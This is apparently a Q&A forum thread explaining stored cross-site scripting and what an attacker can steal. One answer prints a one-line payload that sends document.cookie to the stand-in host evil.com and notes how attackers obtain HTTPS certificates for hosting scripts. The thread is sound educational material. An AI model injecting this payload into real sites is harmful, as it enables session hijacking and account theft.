Xss cross-site-scripting in practise

Question

I know xss attack usees input points of a page to insert javascript code into the page or into server db. In both cases the javascript code will be activated soon or later on some events. I imagine an attacker that uses a browser to put javascript code into a server db using maybe an input name. Another client(victim) makes a request to the same server , maybe it asks for the user classific. The attacker is in classific , so the attacker name(actually evil javascript code) is inserted in the page the victim requested.

The question is what information can the attacker steal and how?

I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.

So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.

Or maybe there are other ways for the attacker to get information?

Answer 1

You can use a Web Application Firewall to scan and block XSS, including in cookies (though the latter can cause false positives) https://medium.com/p/5d4b1d33219a/edit

For AWS WAF refer to https://aws.amazon.com/waf/

Answer 2

I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.

The question is what information can the attacker steal and how?

Yes, the easiest type of attack would be to steal non HttpOnly cookies.

<script>
new Image().src = 'https://www.evil.com/?' + escape(document.cookie);
</script>

Other attacks include injecting JavaScript keyloggers that send key strokes back to the attacker in a similar fashion, or redirecting the user to phishing sites or to sites containing drive by downloads.

So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.

Interesting question. Yes, the site being HTTPS does not reduce the chances of an XSS flaw. They would need to host their attacking page on a HTTPS enabled web server with a certificate trusted by their victim's machine. This could either be the attackers own machine with a cheap SSL certificate paid for by BitCoin where only the domain is validated (not the organisation), it could be an already compromised machine (e.g. if the attacker already has control over another public website), or it could be a stolen certificate from another hacked site that the attacker is now using on their domain (in combination with a DNS hijack or MITM). Edit: Now it is possible to get free certs from the likes of Let's Encrypt and similar.

Little security is required to get a Domain Validated certificate:

Low assurance certificates include only your domain name in the certificate. Certificate Authorities usually verify that you own the domain name by checking the WHOIS record. The certificate can be issued instantly and is cheaper but, as the name implies, these certificates provide less assurance to your customers.